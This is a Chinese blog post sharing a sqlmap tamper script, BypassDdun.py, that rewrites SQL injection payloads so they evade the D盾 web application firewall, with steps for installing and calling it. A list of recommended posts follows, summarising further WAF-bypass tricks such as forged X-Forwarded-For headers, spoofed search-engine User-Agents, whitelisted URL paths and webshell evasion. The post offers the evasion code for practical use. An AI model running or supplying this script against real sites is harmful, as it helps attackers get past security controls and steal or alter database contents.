sqlmap绕过d盾_姿势分享——SQL注入bypass D盾

最新推荐文章于 2025-11-11 21:31:44 发布
最新推荐文章于 2025-11-11 21:31:44 发布 · 6k 阅读 · 6
文章标签:

#sqlmap绕过d盾

本文介绍了如何使用sqlmap结合自定义tamper脚本绕过D盾WAF的策略。作者分享了一种简单实用的混淆SQL语句的方法,以避免被WAF的黑名单正则匹配。读者可以将提供的BypassDdun.py脚本放入sqlmap的tamper目录中,通过--tamper参数调用以实现绕过。

afc9b0edc6f837a36e93dbbfdad61842.gif

首先感谢兄弟们的支持与关注,我们的成长离不开您的陪伴

在我们做项目的途中经常会遇到各种各样的waf,防火墙等来拦截我们的payload,这很是让渗透测试人员头疼,其实网上就有很多关于waf绕过原理的文章,这篇文章就是想告诉大家,当大家理解了网上关于waf绕过的文章的内容并对其原理了解后,其实把理论深化进实践中并没有多困难,本篇文章就是将一个简单常规的小思路实践了一下,便成功绕过了D盾的waf

关于sql注入的waf绕过,说白了就是通过混淆你的sql语句,让他以另外一种方式呈现出来,以绕过waf的黑名单正则匹配,关于sql注入waf绕过的原理在这篇文章里不再重复,我们直接来看实例,分享一种bypass D盾的方法,这里直接贴上tamper。

话不多说,来看代码:

#!/usr/bin/env pythonfrom lib.core.enums import PRIORITY__priority__ = PRIORITY.LOWdef dependencies():    passdef tamper(payload, **kwargs):    """            BYPASS Ddun    """    retVal = payload    if payload:                                                                                       retVal = ""         quote, doublequote, firstspace = False, False, False        for i in xrange(len(payload)):            if not firstspace:                if payload[i].isspace():                    firstspace = True                    retVal += "/*DJSAWW%2B%26Lt%3B%2B*/"                    continue            elif payload[i] == '\'':                quote = not quote            elif payload[i] == '"':                doublequote = not doublequote            elif payload[i] == " " and not doublequote and not quote:                retVal += "/*DJSAWW%2B%26Lt%3B%2B*/"                continue            retVal += payload[i]    return retVal

使用方法:

将以上代码保存为BypassDdun.py,并放进sqlmap的\tamper目录,在下一次使用sqlmap的时候,参数加--tamper=BypassDdun即可调用这个脚本。

如果您觉得文章对您有帮助,点下关注不迷路,日常分享渗透测试骚姿势,我们的成长离不开您的陪伴。

sqlmap绕过d_HTTP协议bypass WAF(狗/)
weixin_39851809的博客
12-09 959
0x00 前言1.最近在整理并总结bypass WAF的一些方法,大概几个板块:注入绕过、漏洞exp绕过、上传绕过以及HTTP协议绕过。期间通过学习 很多国内外好的资源收获了不少,也给大家分享些方法。2.这里仅以HTTP协议其中一部分来bypass WAF来测试并编写sqlmap 的Tamper 发文当天仅测试了安全狗、D其他没有测试。总结的手段大概如下(截图):0x01 HTTP协...
SQL注入之oracle注入+SQLbypass+sqlmap实战
2301_80661529的博客
02-21 1686
Oracle数据库是全球最知名的关系型数据库管理系统(RDBMS)之一,由美国甲骨文公司(Oracle Corporation)开发并维护。作为企业级数据管理解决方案的市场领导者,Oracle数据库在可靠性、安全性、可伸缩性和性能方面具有卓越表现,被广泛应用于各类关键业务场景,包括金融、电信、政府和大型企业的各种复杂应用。**核心特性:**
绕过D,D实战绕过
11-18
绕过D实战,想学习的同学。。抓紧,这是一个带实战的视频。更有一个提升。
SQL注入SQLMAP绕过WAF(安全狗)
最新发布
2401_88381079的博客
11-11 1261
摘要:本文探讨了多种绕过WAF防护的方法:1)通过伪造X-Forwarded-For等HTTP头字段绕过IP白名单检测;2)利用静态资源后缀(.js/.css等)触发WAF的白名单机制;3)构造包含admin/system等白名单关键词的URL;4)伪装搜索引擎User-Agent绕过爬虫过滤。在SQL注入方面,介绍了使用注释符、换行符等方法绕过检测,以及sqlmap工具配合tamper脚本和随机User-Agent的实现方案。针对CC攻击防护,建议降低请求频率、控制线程数量或使用代理IP池。最终目标是绕过
使用sqlmap绕过过滤
08-05
该文档讲解了如何使用sqlmap绕过过滤手段的方法,有兴趣的可以下载看看
sqlmap绕过d_记一次sqlmap --os-shell getshell过程的坑
weixin_39900830的博客
12-05 1149
目标站点输入帅比' or 'a'='a 并随意输入一个密码,提示密码错误,就不多bb了直接sqlmap一把梭。来坑了来坑了,这个位置的注入死活没跑出来,可能的原因:1.我太菜 √2.站点为https然而我没有在数据包里面添加:443 × 登录系统后发现整个系统都是注入,随便找了个其他地方开始了注入……在host后面添加:443 host后面没加:443之前就一直没跑出来,并且sq...
sqlmap绕过d_Web扫目录+SQLmap+外部代理池绕过IP拦截
weixin_39901077的博客
12-06 468
日常渗透必不可免的爆破目录、各种工具一把梭!!而面临的痛点就是IP被ban-.-那么如何绕过拦截呢?前几天刚好碰到大佬的文章,很赞!继续观摩大佬的思路↓ 果然我还是太菜了!!Jaky,公众号:洛米唯熊sqlmap+外部代理池绕过IP拦截0x00:前言一、基于前面写过给"扫目录+N多代理“,这次给sqlmap加一个代理池。用处就是在跑sqlamp注入的时候,防止被ban掉IP.扫目录+N多...
webscan bypassSql注入的笔记
weixin_43952190的博客
06-19 962
一. 360webscan bypass 绕过360webscan通防的方法 1. php_self白名单绕过 原理: $webscan_white_directory='admin|\/dede\/|\/install\/'; php_self中含有 admin或者 /dede/ 或者 /install/时,不过滤字符。 测试: 在urlpath之后添加 /admin ,/dede/ ,/install/之后不拦截 2. white_url白名单绕过 原理: $webscan_white_url =
【ctfshow】web篇-SQL注入 wp
孤桜懶契
08-21 5015
前言 记录web的题目wp,慢慢变强,铸剑。 SQL注入 web171 根据语句可以看到有flag没有被显示出来,让我们拼接语句来绕过 //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; GET传参会自己解码,注释可以用%23(#), --空格,–+等,或者拼接语句不用注释也行 判断有3个字段
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 6540
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
我看过的安全方面的好文章
个人博客
05-18 1145
本文不定期更新,最后更新于2019-5-18 GitHub上实时更新,地址:good-articles-by-sort/安全.md 安全 XSS的各种用途(窃取用户cookie、界面劫持…) 实战Teensy烧录渗透测试U盘 被长期忽视、却危害巨大的邮件追踪术 老歌新唱|PUNYCODE再利用 浅说 XSS 和 CSRF 我是如何拿下一个中学的官方网站的? - 知乎专栏 黑客之死 ROUTER...
第06篇:Bypass D_IIS防火墙SQL注入防御(多姿势)1
08-03
思路:a、白名单 b、绕过union select或select from的检测搭建这个window2003+IIS+php+mysql,可花费不少时间,测试过
Bypass D_防火墙(新版)SQL注入防御.pdf
12-21
Bypass D_防火墙(新版)SQL注入防御.pdf
使用sqlmap 绕过防火墙进行注入测试
热门推荐
煜铭2011
04-20 4万+
0x00 前言 现在的网络环境往往是WAF/IPS/IDS保护着Web 服务器等等,这种保护措施往往会过滤挡住我们的SQL注入查询链接,甚至封锁我们的主机IP,所以这个时候,我们就要考虑怎样进行绕过,达到注入的目标。因为现在WAF/IPS/IDS都把sqlmap 列入黑名单了,呵呵!但是本文基于sqlmap 进行绕过注入测试,介绍至今仍然实用有效的技巧,以下策略在特定的环境能够成功绕...
sqlmap绕过d_技术干货 | 实战绕过双重waf结合sqlmap tamper获取数据
weixin_39839478的博客
12-09 1014
免责声明本公众号发布的文章均转载自互联网或经作者投稿授权的原创,文末已注明出处,其内容和图片版权归原网站或作者本人所有,并不代表安世加的观点,若有无意侵权或转载不当之处请联系我们处理,谢谢合作!欢迎各位添加微信号:qinchang_198231加入安世加 交流群 和大佬们一起交流安全技术//前言某次渗透中遇到的注入存在双层waf的情况,第一层是云waf第二层似乎是本地的安全狗或者是代码层...
sqlmap绕过d_记一次很迷的绕过D的经历
weixin_39949473的博客
12-09 2735
今天上课的时候,无聊的我看着qq中的群聊,突然看到一个学弟说有个存在D的站绕不过去,我心想到我展现自己的时候了,互加好友之后,也拿到了站点。一个单引号打过去给我拦截了。被拦截了,也要想办法毕竟不能丢脸,尝试了很多办法都没有绕过。睡着还被老师发现,让我站起来回答问题,啊这,我灵机一动说我趴着听课呢?逃过一劫,但做人不能放弃啊,我下课直接去吃饭了,已经放弃的我打算写作业,然后又想起来那个站...
sqlmap绕过d_各种姿势绕过WAF
weixin_39683858的博客
12-09 2635
常在河边走,哪有不被狗咬的,记得我刚学渗透时经常遇见"狗",一不小心就弹出这个鬼东西,以前学的那些大小写绕过之类的技巧在这狗面前根本不管用,这还渗透个屁啊!看到这个页面我相信很多小白也是头皮发麻就想放弃了,今天我带来了我家祖传的狗头铡第一种正常情况下get传参这块被各大waf厂商杀的很惨,众所周知把get改成post一样可以正常请求,同时这也是最简单的绕waf姿势把GET改为POST后把...
Bypass之DIIS防火墙SQL联合注入绕过(新版)
18年3月萌新白帽子
07-04 1万+
这种技术文章,不好意思标原创了,一下内容均来自公众号Bypass实验环境IIS+ASPX+MSSQL一、MSSQL特性在MSSQL中,参数和union之间的位置,常见的可填充的方式有如下几种:1.空白字符01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,202.注...
sqlmap绕过d_WEBSHELL免杀绕过WAF思路&方法(一)
weixin_39599830的博客
11-27 765
本文主要介绍WEBSHELL免杀绕过的思路与方法,网上很多的方法基本都被安全厂家加入了检测规则已经不能免杀,所以我们要了解我们主要对手WAF的检测技术,故基于前人优秀基础上我们需要有能力衍生出免杀马,WEBSHELL免杀始终是持续对抗的过程,不可能永久免杀,但也是永远杀不完的。0x00 WEBSHELL的概念:能够接收攻击者的信息指令,并且执行攻击者的指令的程序脚本。 Webshell是运行目标服...
sqlmap怎么绕过d
05-25
SQLMap可以使用不同的技术和选项来绕过D。以下是一些可能有用的技巧: 1. 自定义User-Agent:通过使用自定义的User-Agent字符串,可以让SQLMap绕过一些基于User-Agent的WAF规则。 2. 使用随机字符串:通过使用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值